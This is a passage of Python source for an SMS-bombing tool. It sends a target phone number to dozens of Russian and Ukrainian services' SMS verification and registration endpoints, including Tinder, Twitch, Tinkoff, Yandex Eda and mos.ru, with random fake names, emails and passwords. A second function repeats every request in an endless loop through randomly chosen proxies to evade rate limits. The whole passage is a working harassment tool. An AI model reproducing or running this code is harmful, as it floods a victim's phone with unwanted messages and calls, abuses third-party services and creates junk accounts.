requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'})
good()
except Exception as e:
error()
try:
requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://plink.tech/register/', json={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username})
good()
except Exception as e:
error()
try:
requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'})
good()
except Exception as e:
error()
try:
requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/')
good()
except Exception as e:
error()
try:
requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email})
good()
except Exception as e:
error()
try:
requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]})
good()
except Exception as e:
error()
try:
requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main¤tLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'})
good()
except Exception as e:
error()
try:
requests.post('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11])
good()
except Exception as e:
error()
try:
requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]})
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email})
good()
except Exception as e:
error()
try:
requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'})
good()
except Exception as e:
error()
try:
requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'})
good()
except Exception as e:
error()
try:
requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'})
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone})
good()
except Exception as e:
error()
try:
requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone})
good()
except Exception as e:
error()
try:
requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone})
good()
except Exception as e:
error()
try:
a = requests.get('https://driver.gett.ru/signup/')
requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']})
good()
except Exception as e:
error()
try:
requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'})
good()
except Exception as e:
error()
try:
b = requests.session()
b.get('https://drugvokrug.ru/siteActions/processSms.htm')
requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'})
good()
except Exception as e:
error()
try:
rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]})
good()
except Exception as e:
error()
try:
rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone})
good()
except Exception as e:
error()
try:
psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'})
good()
except Exception as e:
error()
try:
beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone})
good()
except Exception as e:
error()
try:
modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'})
good()
except Exception as e:
error()
try:
data = {'form[NAME]':'Иван',
'form[PERSONAL_GENDER]':'M',
'form[PERSONAL_BIRTHDAY]':'11.02.2000',
'form[EMAIL]':'fbhbdfvbd@gmail.com',
'form[LOGIN]':phone1,
'form[PASSWORD]':None,
'get-new-password':'Получите пароль по SMS',
'user_agreement':'on',
'personal_data_agreement':'on',
'formType':'full',
'utc_offset':180}
aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data)
good()
except Exception as e:
error()
try:
tvzavr = requests.post('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49')
good()
except Exception as e:
error()
try:
cook = requests.post('https://www.netprint.ru/order/profile')
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate, br',
'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
'Connection':'keep-alive',
'Content-Length':145,
'Cookie':'unbi=' + cook.cookies['unbi'],
'Host':'www.netprint.ru',
'Origin':'https://www.netprint.ru',
'Referer':'https://www.netprint.ru/order/profile',
'Sec-Fetch-Mode':'cors',
'Sec-Fetch-Site':'same-origin',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48',
'X-Requested-With':'XMLHttpRequest'}
netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1})
good()
except Exception as e:
error()
try:
requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7})
good()
except Exception as e:
error()
try:
requests.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en')
good()
except Exception as e:
error()
try:
requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone',
'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'})
good()
except Exception as e:
error()
try:
requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone,
'SignupForm[device_type]':3})
good()
except Exception as e:
error()
try:
requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone,
'locale':'en', 'countryCode':'ru', 'version':'1',
'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'})
good()
except Exception as e:
error()
try:
requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request',
'phone':'+' + phone, 'phone_permission':'unknown',
'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown',
'devicemodel':'unknown'})
good()
except Exception as e:
error()
try:
password = ''.join(random.choice(string.ascii_letters) for _ in range(6))
requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone})
good()
except Exception as e:
error()
try:
requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone})
good()
except Exception as e:
error()
try:
requests.get('https://findclone.ru/register?phone=+' + phone)
good()
except Exception as e:
error()
try:
requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={})
good()
except Exception as e:
error()
try:
requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={})
good()
except Exception as e:
error()
try:
requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={})
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'})
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}})
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone})
good()
except Exception as e:
error()
try:
requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''})
good()
except Exception as e:
error()
try:
requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email})
good()
except Exception as e:
error()
def spamProxy(phone):
while True:
def proxy():
with open(file_name) as file:
list_proxy = file.read().split('\n')
random_proxy_count = randint(0, len(list_proxy) - 1)
try:
proxies = {'http': list_proxy[random_proxy_count].split(' ')[1]}
return proxies
except:
proxies = {'http': list_proxy[(random_proxy_count - 1)].split(' ')[1]}
return proxies
_name = ''
for x in range(12):
_name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
_email = _name + '@gmail.com'
email = _name + '@gmail.com'
_phone = phone
_phone9 = _phone[1:]
_phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10]
_phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11]
_phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_text = 'Ляля'
phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10]
phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10]
try:
requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://plink.tech/register/', json={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post(('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main¤tLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post(('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11]), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
a = requests.get('https://driver.gett.ru/signup/', proxies=(proxy()))
requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
b = requests.session()
b.get('https://drugvokrug.ru/siteActions/processSms.htm', proxies=(proxy()))
requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
data = {'form[NAME]':'Иван',
'form[PERSONAL_GENDER]':'M',
'form[PERSONAL_BIRTHDAY]':'11.02.2000',
'form[EMAIL]':'fbhbdfvbd@gmail.com',
'form[LOGIN]':phone1,
'form[PASSWORD]':None,
'get-new-password':'Получите пароль по SMS',
'user_agreement':'on',
'personal_data_agreement':'on',
'formType':'full',
'utc_offset':180}
aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data, proxies=(proxy()))
good()
except Exception as e:
error()
try:
tvzavr = requests.post(('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
cook = requests.post('https://www.netprint.ru/order/profile', proxies=(proxy()))
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate, br',
'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
'Connection':'keep-alive',
'Content-Length':145,
'Cookie':'unbi=' + cook.cookies['unbi'],
'Host':'www.netprint.ru',
'Origin':'https://www.netprint.ru',
'Referer':'https://www.netprint.ru/order/profile',
'Sec-Fetch-Mode':'cors',
'Sec-Fetch-Site':'same-origin',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48',
'X-Requested-With':'XMLHttpRequest'}
netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone',
'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone,
'SignupForm[device_type]':3},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone,
'locale':'en', 'countryCode':'ru', 'version':'1',
'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request',
'phone':'+' + phone, 'phone_permission':'unknown',
'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown',
'devicemodel':'unknown'},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
password = ''.join(random.choice(string.ascii_letters) for _ in range(6))
requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://findclone.ru/register?phone=+' + phone), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy()))
good()
except Exception as e:
error()
class Queue:
def __init__(self):
self.queue = []
